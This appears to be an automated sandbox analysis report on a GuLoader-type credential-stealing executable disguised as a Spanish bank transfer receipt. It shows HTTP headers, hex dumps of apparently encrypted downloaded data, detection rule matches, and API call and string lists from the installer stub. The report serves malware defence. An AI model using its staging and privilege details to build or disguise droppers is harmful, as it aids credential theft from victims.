X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 240192 Last-Modified: Wed, 13 Mar 2024 08:04:39 GMT Date: Mon, 18 Mar 2024 14:06:45 GMT Expires: Mon, 18 Mar 2024 14:06:45 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=+37rCg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-03-18 14:06:45 UTC	4687	IN	Data Raw: 78 7d 4c 71 49 8f 5d 50 02 02 4d cd f6 ff 7f 19 57 c1 c7 b6 1f 1e 2e 8d a8 7d e7 af 0a 77 89 fb 36 ba 67 5f 7a de 7e 11 7e 42 d9 db 56 f6 bc 29 fb ef 21 df db ec 3a 4b 86 5f bd dd a6 66 f4 c1 3c c4 0f ce 21 a9 13 84 de 30 e6 cc 42 94 fa e0 83 cf 3f 71 7d 9f 1d e7 5a 20 e2 58 26 8d cd 97 ad 56 c9 ee 3e db fc 4c e0 75 0e e3 b5 43 af e0 b6 6a 85 d2 a2 79 5e 2a e5 96 a9 6f d5 c0 d2 46 59 e5 83 7b 42 17 76 0a 05 d8 52 82 1f df 51 73 8b a2 ad 0e 8c d8 da 95 78 82 e5 57 31 c2 b3 83 9c 89 2e 37 30 d1 82 88 f6 95 12 e6 0e 2f 9e 6b 7e bf eb 8d ea 45 8c d7 f6 71 88 b2 ea 28 17 ad cb ee f3 a3 b4 95 f8 3c 4e 9b c3 ed b1 21 f4 d7 5f 72 5e 7f cb 82 c2 80 b5 89 9a 89 b7 d5 1d 44 09 45 23 bd eb e1 68 6c 5d e2 a9 13 1e 75 49 84 0e fa 69 03 dd f4 f5 b5 7a d4 78 73 26 88 f7 Data Ascii: x}LqI]PMW.}w6g_z~~BV)!:K_f<!0B?q}Z X&V>LuCjy^*oFY{BvRQsxW1.70/k~Eq(<N!_r^DE#hl]uIizxs&
2024-03-18 14:06:45 UTC	4687	IN	Data Raw: 7e 0f 56 6f 4c a9 34 fe 1a 4b 56 22 de 74 74 65 99 a5 96 76 f7 ec 39 00 9c b5 66 f3 09 c8 4b c6 87 c9 ae 7c 4d b6 ce 7f 1a e8 ce 4e 2e 65 ca 12 ce b7 24 9a 1e b6 4d 5d 05 09 6e 77 7d 9b ae 8d 5e 87 bc 1d d8 6d d0 05 5b 34 57 8d 22 f7 fa b4 47 5b 17 d7 cd 7e 9b ff b0 5b e8 80 a6 47 ec d1 4e 0f 61 18 82 f9 7e 16 f8 3e 84 a9 ce 43 d3 61 d5 d0 26 8a 86 97 4d f4 9f 09 06 11 68 73 17 45 c7 f3 01 b2 ad 59 ea 9d 13 27 43 d5 4a b0 2e d6 5d d5 71 af 0d e0 ea dd 8b 43 cd 34 98 05 b3 c0 6e a4 cf 7a 27 93 87 99 1c b1 46 e8 98 66 a6 a9 d6 38 3f 42 fb ab f8 b3 64 d9 a3 05 d9 de 9c 04 82 e9 23 67 21 ff d4 aa cb 3c f8 02 34 71 bd de 7b 10 97 73 e1 20 90 ea 9d 17 da ef 82 d6 62 de 44 8a c5 3f b5 08 93 78 bc b1 d7 c2 c6 90 fa fb 9b 75 ad d1 01 ed be a8 c3 ce 4c b1 6f 91 40 Data Ascii: ~VoL4KV"ttev9fK\|MN.e$M]nw}^m[4W"G[~[GNa~>Ca&MhsEY'CJ.]qC4nz'Ff8?Bd#g!<4q{s bD?xuLo@
2024-03-18 14:06:45 UTC	1959	IN	Data Raw: 5c 93 2e 1a d3 57 d1 b0 59 c7 f4 ef 51 19 b0 cf 96 5c 37 85 50 44 a8 c5 24 57 f7 63 84 ee 51 fe 4e 57 4d a8 18 d5 f1 e0 e7 30 6d 02 75 da fd 88 73 7b 67 d9 bd 5c 51 25 fe 20 91 39 ac b0 f9 33 9a f7 4f 38 a9 aa 97 85 f0 cc ef a8 c6 62 42 e0 f6 70 7b 96 a9 dc ea 04 40 23 45 68 ab ab a6 6d e6 66 ff fd ad 0b 23 b0 34 14 87 94 a3 ba 92 0d a7 5c 75 6e 1a 3d 45 de 62 ee 1b b9 09 ae 20 56 ff d0 0e 02 c2 95 79 84 2f ea 22 fc 30 f8 ef f1 1e be 88 6f 47 cb 45 0b 8e 84 2b 56 48 25 86 50 e8 62 a8 9d a2 11 89 83 0b 52 50 af 02 5f 54 75 b7 0a f9 a3 f0 c3 1e 12 50 33 dc 2f 9d 2e 81 75 27 db 7e b5 43 eb 6b 57 1a f1 f2 55 8f a7 05 4b 22 a1 3b fc 04 55 0d 1c 68 82 f6 b7 1a 2d 96 ee 99 75 a8 1a 9b de 02 a1 8d 31 da ea 89 c9 e4 5e 35 18 05 2f 4e d5 bb a0 28 73 47 8e 4e 51 8e Data Ascii: \.WYQ\7PD$WcQNWM0mus{g\Q% 93O8bBp{@#Ehmf#4\un=Eb Vy/"0oGE+VH%PbRP_TuP3/.u'~CkWUK";Uh-u1^5/N(sGNQ
2024-03-18 14:06:45 UTC	1252	IN	Data Raw: 36 f0 76 63 41 bf 77 0c 8e 86 d5 a6 4b 1c a8 54 e8 62 90 26 52 ed 76 a3 fd 5e 53 af dc 55 58 75 b7 0a f4 96 d3 e3 06 12 ae 3a 22 2e d8 6d 81 75 23 db 7e b3 43 c5 6f 56 1a d8 d8 69 8f 8c f1 6d 1f a1 1b f3 fa 5b 0d e2 46 98 f6 b7 e4 df 9b e2 b9 77 56 16 97 20 23 8e 9c 31 da 14 76 fc c4 5e cb 16 fa 23 6a d6 6b e5 28 8d 48 a5 72 51 70 96 7c 54 2e 40 3b 43 0c 8e 10 fa ca 9d 9d 3d 87 cf 5d 03 78 42 c4 4f 73 0e 6b ed 7b d2 8f 33 f2 14 08 eb 9f c0 29 a1 a6 d9 34 54 ba b1 b4 a6 b3 00 ea 14 53 69 a7 a6 5f 82 f0 3c 9a eb 07 aa 82 e2 48 3f c1 b2 c1 40 2e 74 d7 3f f2 47 83 39 94 f0 51 c7 12 80 9d dd 98 e4 e3 6a 8f f2 28 71 b3 74 60 f7 27 73 e0 b1 cb 02 88 3e e0 9b c1 a4 5e 63 bf 9a ab 15 21 08 51 df 6a f1 1c 87 87 2d 79 ff 65 0f 4d 3f f8 3f 9d e1 82 93 47 ed 51 70 d6 Data Ascii: 6vcAwKTb&Rv^SUXu:".mu#~CoVim[FwV #1v^#jk(HrQp\|T.@;C=]xBOsk{3)4TSi_<H?@.t?G9Qj(qt`'s>^c!Qj-yeM??GQp
2024-03-18 14:06:45 UTC	1252	IN	Data Raw: 86 13 a5 cb c3 76 f2 49 a7 fd b3 5f a1 96 3a c8 41 9b 9a 74 3f f9 94 33 29 29 b0 8c f4 29 ad 89 17 cc c3 9c 73 78 ec 9b a5 42 b6 51 7c fd 58 80 90 d7 5c aa 78 bc 97 e9 90 09 29 5a e5 c4 e2 98 54 52 98 a6 33 9c 79 46 51 4b 23 58 33 62 9b 01 96 d8 b5 46 2f 58 b6 03 b2 7d f5 c8 96 42 b9 68 11 f4 78 ba 47 e0 b0 21 ca 69 eb 28 1f 12 8d ed 22 57 53 1a 46 13 37 99 eb cb c2 4c 9b ff 5d 49 bc f5 40 11 b9 6e ed d5 7e 3e ef 16 2e d8 66 0b 26 16 f2 a1 69 22 ea 87 48 28 8f 4a 0c 3d 85 04 1e 95 a0 c7 b0 39 60 8c de dc 98 ef 1a e5 24 b4 89 d8 0d 8a 92 b7 9c f9 71 9e bf cc 22 a9 13 7a d4 33 e6 cc 43 67 f9 e0 1b cf 3f 71 7d 61 1c de 10 20 e2 58 26 ad cc 97 ad 56 37 e0 3d db fc b2 ec 76 0e c3 b6 43 af e0 48 6b bc d7 a2 79 5e 12 e0 96 a9 6f 6d 48 2d b9 a8 d2 69 75 42 a9 10 Data Ascii: vI_:At?3)))sxBQ\|X\x)ZTR3yFQK#X3bF/X}BhxG!i("WSF7L]I@n~>.f&i"H(J=9`$q"z3Cg?q}a X&V7=vCHky^omH-iuB
2024-03-18 14:06:45 UTC	1252	IN	Data Raw: 8d 26 f7 fa b4 47 5b 17 d7 cd 7e 9b ff b0 5b ef 80 a6 47 ec d1 4e 16 61 18 82 87 51 17 f8 3a bd 34 c0 43 d3 41 23 dc 26 8a 58 9d 4d f4 9f 09 0b 28 6d 53 1f 45 ff f6 ff b3 94 72 b8 62 ec ab 3a d5 4a b6 b5 e5 5f d5 95 8f 04 e0 e6 dd 75 5c ed 34 98 fb bf 3e 60 86 cf 42 a6 93 79 98 25 45 4a ea 98 46 84 a8 d6 38 c1 bd cc b9 f8 b3 9a f5 a3 05 f9 d4 62 0a 82 17 02 5d 24 ff d4 54 fd 3b f8 02 ca 45 2a 20 a4 ee bd 73 e1 cd a1 d5 81 44 db ef 7c dd 62 de 2e de c5 3f b1 20 31 76 b8 bb d5 77 c7 90 fa db 67 79 a9 d1 df e1 bc a8 c3 ce 41 8a ee b1 40 fb 72 e5 28 48 cf 41 d3 a5 d4 03 0b af d5 6c 42 4a 40 c2 89 a1 d3 18 38 1c 5e 8e ec 3c b3 fc 55 7f 4c a6 9d 74 b6 8e 3b ed 33 22 f4 d9 27 30 90 6a 39 84 e9 a7 2b 3f ac ac c4 23 cc 4e 9f d3 4d d9 04 18 11 f8 ce b2 ba e6 54 3c Data Ascii: &G[~[GNaQ:4CA#&XM(mSErb:J_u\4>`By%EJF8b]$T;E* sD\|b.? 1vwgyA@r(HAlBJ@8^<ULt;3"'0j9+?#NMT<
2024-03-18 14:06:45 UTC	1252	IN	Data Raw: 95 ef 5c 02 78 42 2b 61 70 0e 6b 13 89 df 8f 13 cc 87 1a eb 61 c1 ee a8 a6 d9 14 58 bf b1 b4 58 8a cf 36 eb ac 43 59 af 5f 91 e5 44 ee f2 06 ae f0 e5 4c 3f a0 ba da 40 2e 7e 54 45 f1 47 bf 1c a0 f0 51 c7 12 82 9e dd b8 1e ef 6a 8f 2c 3f 48 90 74 9e f6 e0 58 e0 b1 b7 98 81 3e e4 40 b6 d2 5e 9d b7 e9 8f 39 22 78 79 ef 94 ff 16 fa d3 28 79 fb 45 e6 43 3c f8 c1 6d ed 81 93 99 e2 51 70 f6 80 41 55 4c 06 80 02 9a e2 d7 1d 78 03 e2 03 10 ca 07 ae f3 e0 29 22 a7 04 bb 81 a8 13 ab 71 65 20 38 d3 78 49 44 05 70 10 c1 b3 49 0e 82 7f b7 17 2f 63 2e 05 98 37 7a 7e af 80 f9 df c5 a8 d7 f0 9b ba dd 9a f5 1c 89 cb bc 24 10 70 e9 ec 21 a4 b2 37 fd 64 90 5b 18 b5 45 f9 ae 30 dc 75 33 bb 8f 9c 69 04 74 02 a7 ed 29 e6 6c 7e a3 0f 59 72 ad 4e 25 20 ef ef 9e aa ce bf e8 e2 c7 Data Ascii: \xB+apkaXX6CY_DL?@.~TEGQj,?HtX>@^9"xy(yEC<mQpAULx)"qe 8xIDpI/c.7z~$p!7d[E0u3it)l~YrN%
2024-03-18 14:06:45 UTC	1252	IN	Data Raw: 5d 49 42 f4 87 3f ba 6e cd 29 77 3e ef cd 54 95 68 0b 22 64 52 78 69 52 c2 bc 4b 28 85 37 86 33 86 00 3e 60 ac c4 b0 e7 6f 8c de dc 98 e2 23 f7 04 91 89 f8 0d 74 93 8e 40 f7 71 9e 61 c7 22 a9 36 ff ae 30 e6 c8 cf c1 fe e0 4b e7 24 71 7d 95 60 93 1a 20 e6 78 00 8d cd 97 53 58 c9 ee 3e 25 f0 4c e0 55 14 e3 b5 43 51 e1 8f 60 85 d2 a2 53 7e 31 e5 96 a9 91 5b c0 d2 46 a9 f6 39 75 62 a1 7f c7 24 9e 52 f7 c0 fe 05 1b 1c d8 8d 7e d6 fa bd e7 1f cf c6 34 50 ac 23 e2 e8 a9 4c ac 1c a3 f7 c6 c9 fc 7c c6 b4 61 f4 69 13 d0 8f 16 cd 48 81 f8 a9 05 88 b2 ee 5a a1 a9 9b db db b8 f8 94 f1 41 20 55 26 8c 91 01 f4 d7 5f 8c 50 7f 2b 82 3e 8d be 88 b1 f9 b7 75 1e ba 08 74 29 bd eb e1 42 4c 02 5d aa 13 e0 5b 49 84 0e c4 66 03 dd d4 89 b5 7a f4 86 72 1f 9d f7 bc a3 01 78 88 39 Data Ascii: ]IB?n)w>Th"dRxiRK(73>`o#t@qa"60K$q}` xSX>%LUCQ`S~1[F9ub$R~4P#L\|aiHZA U&_P+>ut)BL][Ifzrx9
2024-03-18 14:06:45 UTC	1252	IN	Data Raw: 39 fc 22 3c 49 28 20 7a e1 bd 73 e1 cd ac ec 9d 64 87 ef 82 d4 9c df 6c a0 c5 3f b5 22 4d 2b b8 b1 ef 03 c9 90 fa fb 9b 75 a9 d1 01 be be a8 c3 ce 4c b1 f9 91 40 fb 8c ec d7 49 d6 3c d3 a5 d4 43 93 54 2a 93 62 e6 4e c0 89 5f 23 14 3a 1c 80 81 ec 3c 93 6d 54 46 49 58 9c 4d a1 8b 3b ed cd 13 8e 26 fd b4 1a 63 39 80 6c db 2b 3f 56 80 3b 2d e5 01 61 de 4b b6 4f 45 11 f2 ec 57 b3 e6 5e 3a 01 01 6b cf 35 67 18 51 a8 df 42 8d 29 52 b3 65 d5 b1 f4 2d 5d 26 e0 a3 aa 81 c0 25 17 57 3e 35 11 81 c7 c6 f5 c6 3a a2 db 94 48 2c ec c0 e5 84 60 05 ce 42 c7 ef ed 5a 0c 59 41 d3 62 26 64 b6 60 db 36 03 b6 91 bc b3 0d 66 cc 27 7d 19 39 2a 56 e3 6e 26 9e 41 c8 be 33 94 ce ff a0 a1 b1 f9 4d 05 c8 43 c8 9d 31 53 14 87 eb 62 26 ae 56 f0 81 2d dc 6a c7 38 1f 26 a4 7e 5d 16 37 75 Data Ascii: 9"<I( zsdl?"M+uL@I<CTbN_#:<mTFIXM;&c9l+?V;-aKOEW^:k5gQB)Re-]&%W>5:H,`BZYAb&d`6f'}9Vn&A3MC1Sb&V-j8&~]7u
2024-03-18 14:06:45 UTC	1252	IN	Data Raw: 51 70 d6 30 4f 55 4c f8 7f 37 8d e2 f7 0a 86 0a e3 fd 31 85 0d ae f3 a0 66 0b bf 04 9b ce 56 1d ab 8f 6b de 34 d3 86 65 7c 05 50 32 3f b2 70 fa 83 46 95 3d 0f 5a d0 0c 98 c9 51 05 db 80 07 d7 b7 92 f3 93 eb 92 c6 64 f4 2f 95 bf bc 24 ea 59 ca ec 09 e2 4c 39 fb 9a 99 a5 14 9d 00 d9 e2 36 fc 75 cd ba b6 40 68 5b 8a f5 af ed 09 d1 17 0a a3 f1 5c 20 fd 4a 25 50 39 f5 c1 54 cd c3 9c c2 63 18 18 84 ca 91 bb 4a 5f 1d b3 44 db 38 f1 e2 2c ca 30 b0 a5 e4 42 d1 04 7e 84 55 47 f7 0f 60 aa 1c 7d 9f 4e e0 d6 be 67 b4 a6 86 d5 84 72 9d 7b e3 73 88 d6 27 b8 06 ea 87 6a b6 ae b0 c5 21 28 f3 d4 cb 8c a6 91 fa f1 91 b4 89 0a ee c2 91 e7 70 7f a5 1c 2b ce 73 ad 25 b9 ca aa d2 b5 a9 44 40 b3 d7 8d f6 21 72 57 c3 f1 31 d1 0f fe 79 9b 47 a9 60 70 25 f7 b5 18 54 6b bc 99 cb 47 Data Ascii: Qp0OUL71fVk4e\|P2?pF=ZQd/$YL96u@h[\ J%P9TcJ_D8,0B~UG`}Ngr{s'j!(p+s%D@!rW1yG`p%TkG

Target ID:	0
Start time:	15:06:12
Start date:	18/03/2024
Path:	C:\Users\user\Desktop\comprobante de transferencia.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\comprobante de transferencia.exe
Imagebase:	0x400000
File size:	800'824 bytes
MD5 hash:	8A1422827315B9DB63CD6B399A454FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2920518142.0000000005056000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:06:33
Start date:	18/03/2024
Path:	C:\Users\user\Desktop\comprobante de transferencia.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\comprobante de transferencia.exe
Imagebase:	0x400000
File size:	800'824 bytes
MD5 hash:	8A1422827315B9DB63CD6B399A454FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.7701035769.0000000034211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.9%
Dynamic/Decrypted Code Coverage:	13.7%
Signature Coverage:	20%
Total number of Nodes:	1542
Total number of Limit Nodes:	44

Executed Functions

Function 0040326A Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040328D
GetVersion.KERNEL32 ref: 00403293
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
#17.COMCTL32(00000007,00000009), ref: 004032DF
OleInitialize.OLE32(00000000), ref: 004032E6
SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\comprobante de transferencia.exe",00000000), ref: 0040332A
CharNextW.USER32(00000000,"C:\Users\user\Desktop\comprobante de transferencia.exe",00000020), ref: 00403351

Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348B
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040349C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034A8
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BC
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C4
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D5
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034DD
DeleteFileW.KERNELBASE(1033), ref: 004034F1

Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027

OleUninitialize.OLE32(?), ref: 004035BC
ExitProcess.KERNEL32 ref: 004035DD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004035F0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C), ref: 004035FF
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040360A
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\comprobante de transferencia.exe",00000000,?), ref: 00403616
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403632
DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
CopyFileW.KERNEL32(C:\Users\user\Desktop\comprobante de transferencia.exe,0041FEA8,?), ref: 004036A0
CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FC
OpenProcessToken.ADVAPI32(00000000), ref: 00403703
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
ExitProcess.KERNEL32 ref: 00403783

Strings

Error launching installer, xrefs: 00403573
C:\Users\user\Desktop\comprobante de transferencia.exe, xrefs: 0040369B
TMP, xrefs: 004034D8
\Temp, xrefs: 004034A2
~nsu, xrefs: 004035E8
1033, xrefs: 004034EC
C:\Users\user\AppData\Local\Temp\, xrefs: 00403480, 00403485, 0040349B, 004034A7, 004034B6, 004034C3, 004034CF, 004034D7, 004035ED, 004035FE, 00403609, 00403615, 00403622, 00403631, 004036E2
"C:\Users\user\Desktop\comprobante de transferencia.exe", xrefs: 0040331D, 00403323, 00403519
.tmp, xrefs: 00403604
Low, xrefs: 004034BE
SeShutdownPrivilege, xrefs: 00403712
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven, xrefs: 0040346E, 0040358E, 00403638, 00403642
TEMP, xrefs: 004034D0
C:\Users\user\Desktop, xrefs: 0040360F, 00403614, 00403641
UXTHEME, xrefs: 004032B0, 004032B5, 004032BB
NSIS Error, xrefs: 00403308
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven, xrefs: 00403599

Memory Dump Source

Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$C:\Users\user\Desktop$C:\Users\user\Desktop\comprobante de transferencia.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-3436291073
Opcode ID: c7933ff0207dc42ed488cfd770cac36fd4143b1ba3a2b25aa7f82e1899741bfa
Instruction ID: 73295983c26b9bc795aacbdf710e3d5853a553e8a558082b103844ae68e0e3ab
Opcode Fuzzy Hash: c7933ff0207dc42ed488cfd770cac36fd4143b1ba3a2b25aa7f82e1899741bfa
Instruction Fuzzy Hash: C3D1F470644200BBD720BF659D45A3B3AACEB8074AF10487EF541B62D2DB7D9D42CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 004052B8 Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405316
GetDlgItem.USER32(?,000003EE), ref: 00405325
GetClientRect.USER32(?,?), ref: 00405362
GetSystemMetrics.USER32(00000002), ref: 00405369
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
ShowWindow.USER32(?,00000008), ref: 00405405
GetDlgItem.USER32(?,000003EC), ref: 00405426
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
GetDlgItem.USER32(?,000003F8), ref: 00405334

Part of subcall function 00404113: SendMessageW.USER32(00000028,?,?,00403F3F), ref: 00404121

GetDlgItem.USER32(?,000003EC), ref: 00405478
CreateThread.KERNELBASE(00000000,00000000,Function_0000524C,00000000), ref: 00405486
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040548D
ShowWindow.USER32(00000000), ref: 004054B1
ShowWindow.USER32(?,00000008), ref: 004054B6
ShowWindow.USER32(00000008), ref: 00405500
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
CreatePopupMenu.USER32 ref: 00405545
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
GetWindowRect.USER32(?,?), ref: 00405579
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405592
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
OpenClipboard.USER32(00000000), ref: 004055DA
EmptyClipboard.USER32 ref: 004055E0
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
GlobalLock.KERNEL32(00000000), ref: 004055F6
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
GlobalUnlock.KERNEL32(00000000), ref: 0040562A
SetClipboardData.USER32(0000000D,00000000), ref: 00405635
CloseClipboard.USER32 ref: 0040563B

Strings

&B, xrefs: 004055A6
{, xrefs: 0040551E
